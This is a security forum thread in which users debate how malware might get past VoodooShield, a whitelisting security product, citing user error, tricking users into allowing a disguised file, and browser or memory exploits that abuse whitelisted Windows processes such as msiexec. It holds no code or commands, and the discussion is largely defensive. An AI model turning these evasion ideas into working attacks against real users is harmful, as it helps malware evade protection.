How would malware or viruses get passed voodoo shield? Just curious.
How would one get passed voodoo shield?
- Thread starter LukeNukesEm
- Start date
- Nov 19, 2014
- 2,350
First the easier method is the user allowing something bad. Then we have running smart or autopilot and it fails to detect a virus, VS is exploited and finally by a method that VS doesn't protect from.
A vulnerability within VDS that can be exploited to bypass protection.
More commonly, user error.
I was asking this to use whatever methods I can learn from how they would get passed voodoo shield. For example I now know to be more aware of what apps I allow with voodoo shield.
So if I were very aware of what I allow, voodoo shield practically makes me near bullet-proof?
Last edited by a moderator:
- Aug 2, 2015
- 4,286
Still poorly worded but VS is very secure, it is you who would be more likely to let something through than for VS to fail you Like Huracan points out.
Still even if a user here knew how to bypass VS, I assure you it would not be posted here.
- Sep 17, 2016
- 113
I would use a safe file to trick the user of installing the malware, once you allow something there is no other way of checking the file. So there you go. If you use it with BitDefender Free or other product that has IDS/BB it's a little harder.
In conclusion, I exploit the user and the confusing alerts
In conclusion, I exploit the user and the confusing alerts
- Nov 19, 2014
- 2,350
And you run always on mode then yes. Chance of getting infected gets low.
EDIT: Also if you have the premium version disable allow by parent process in advance settings.
- Aug 2, 2015
- 4,286
Not even close, Voodoo AI would most likely catch the payload, have you ever used VS before ?I would use a safe file to trick the user of installing the malware, once you allow something there is no other way of checking the file. So there you go. If you use it with BitDefender Free or other product that has IDS/BB it's a little harder.
In conclusion, I exploit the user and the confusing alerts
- Sep 17, 2016
- 113
Yes and Yes, like I said before you exploit the confusing alerts
It's like any other security product (you don't even know what you install or what you allow).Once you allow something, that is a bypass.
- Aug 2, 2015
- 4,286
The file approach would be more likely than not to fail, and you should know that if your familiar with VS.Yes and Yes, like I said before you exploit the confusing alerts
Once you allow something, that is a bypass.
now were back to "User Error"
Last edited:
- Sep 17, 2016
- 113
I don't know why you keep saying that I don't know how it works or that I'm not familiar with VoodooShield. Just because I said my point of view and you don't agree doesn't mean that I don't understand how it works or that I'm wrong
I'm using Comodo with the best settings you can have and you can still bypass it
The OP wanted to know some points of view and we gave him, it's not about how good this product is and how nothing can bypass it.
I'm using Comodo with the best settings you can have and you can still bypass it
The OP wanted to know some points of view and we gave him, it's not about how good this product is and how nothing can bypass it.
Browser exploit that abuses whitelisted Windows processes - e.g. NET Framework, msiexec, etc - and \ or use memory exploits.
- Aug 2, 2015
- 4,286
I will comment no further, but what I clearly stated is that "if your truly familiar" with VS then you should be aware that hiding a payload within a safe or whitelisted file, process, or folder will mostlikely fail due to VoodooShields AI, suggesting its a viable approach to bypassing VS in and of itself speaks volumes as to your experience with VS period, I infer nothing else.I don't know why you keep saying that I don't know how it works or that I'm not familiar with VoodooShield. Just because I said my point of view and you don't agree doesn't mean that I don't understand how it works or that I'm wrong
I'm using Comodo with the best settings you can have and you can still bypass it
The OP wanted to know some points of view and we gave him, it's not about how good this product is and how nothing can bypass it.
No software is 100% thats common knowledge.
- Sep 17, 2016
- 113
I will comment no further, but what I clearly stated is that "if your truly familiar" with VS then you should be aware that hiding a payload within a safe or whitelisted file, process, or folder will mostlikely fail due to VoodooShields AI, suggesting its a viable approach to bypassing VS in and of itself speaks volumes as to your experience with VS period, I infer nothing else.
No software is 100% thats common knowledge.
This is the same with any security product, the human factor is the most important because he/she must know what to allow or what to block, it's the same with firewalls and the list goes on. That's why you should always have a second opinion scanner if you use some type of Default Deny, HIPS and so on.
Also, that's why I never recommend a security product to anyone.
- Aug 31, 2016
- 578
My understanding from what Dan has said on the other forum is Web apps are protected and cannot run vulnerable system processes. Would that mitigate the risk of the type of exploit you are referring to?
- Sep 17, 2016
- 113
VoodooShield can't be bypassed by Browser attacks, from what I tested you can bypass VoodooShield if you do it yourself (I tested in Auto-Pilot), what I'm saying is if you click on the alert and allow it. There is a high chance that you can bypass it with sponsored type attacks or some type of gov attack (targeted for VoodooShield).
- Aug 2, 2015
- 4,286
Very astute Mark and correct, the way he suggested to foil VS was misinformation and as a self proclaimed "advanced user"
this surprised me is all. Oh well I'm past it now.
Great post Mark
- Aug 31, 2016
- 578
Thank you. Well, we can't have people who might read this thread think VS isn't a credible security layer to have on your PC. That would be an injustice.Very astute Mark and correct, the way he suggested to foil VS was misinformation and as a self proclaimed "advanced user"
this surprised me is all. Oh well I'm past it now.
Great post Mark
- Aug 17, 2013
- 1,905
Can you provide a video demonstration? I'd be interested and it would help the Dev's tooI would use a safe file to trick the user of installing the malware, once you allow something there is no other way of checking the file. So there you go. If you use it with BitDefender Free or other product that has IDS/BB it's a little harder.
In conclusion, I exploit the user and the confusing alerts
- Aug 2, 2015
- 4,286
